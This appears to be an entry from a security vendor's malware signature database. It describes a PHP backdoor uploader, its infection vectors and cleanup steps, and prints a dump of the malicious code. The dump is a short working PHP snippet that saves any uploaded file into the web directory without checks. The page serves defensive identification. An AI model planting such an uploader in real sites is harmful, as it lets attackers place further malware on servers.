Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.backdoor.uploader.009

php.backdoor.uploader.009

PHP uploaders are commonly part of the backdoors. They can be often found with another types of malicious code. They're allowing the attacker to upload other malicious files to the server

Affecting

Any vulnerable PHP based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your site's files looking for suspicious usage of fwrite functions or files that you don't recognize. Also you can sign up with us and let our team remove the malware for you.

Dump

$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if ( isset($_FILES["userfile"]) ) {
echo "Upload ";
if (move_uploaded_file
($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;
else echo "failed";
}